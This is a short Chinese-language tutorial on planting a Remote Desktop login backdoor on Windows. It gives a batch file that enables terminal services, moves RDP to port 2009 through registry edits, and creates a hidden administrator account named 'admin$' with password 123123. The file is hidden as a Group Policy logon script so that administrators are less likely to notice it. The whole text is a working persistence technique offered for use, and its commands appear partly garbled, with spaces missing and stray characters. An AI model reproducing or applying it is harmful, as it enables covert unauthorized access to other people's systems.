简单方法制造终端登录后门

　　本文主要讲述简单型远程终端后门的制作方法，以便大家了解后门的实现与使用。
　　通常提权时会想到启动项目，如果后门留到这个位置肯定是不适合的。很容易就被别人发现。往往组策略添加脚本执行是一个比较好的方法，在组策略登录脚本设置后门执行代码当管理员登录时后门就会被创建。
　　把以下内容保存为1.bat。
　　REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f//开启终端服务
　　REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\Wds\rdpwd\Tds\tcp/vPortNumber/tREG_DWORD/d0×7d9/f//改为2009连接终端
　　REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\WinStations\RDP-Tcp/vPortNumber/tREG_DWORD/d0×7d9/f//改为2009连接终端
　　netuseradmin$123123/add
　　netlocalgroupadministratorsadmin$/add
　　打开组策略，开始--运行-gpedit.msc
　　用户配置--windows设置-脚本--登录把1.batcopy到登录脚本目录添加1.bat即可。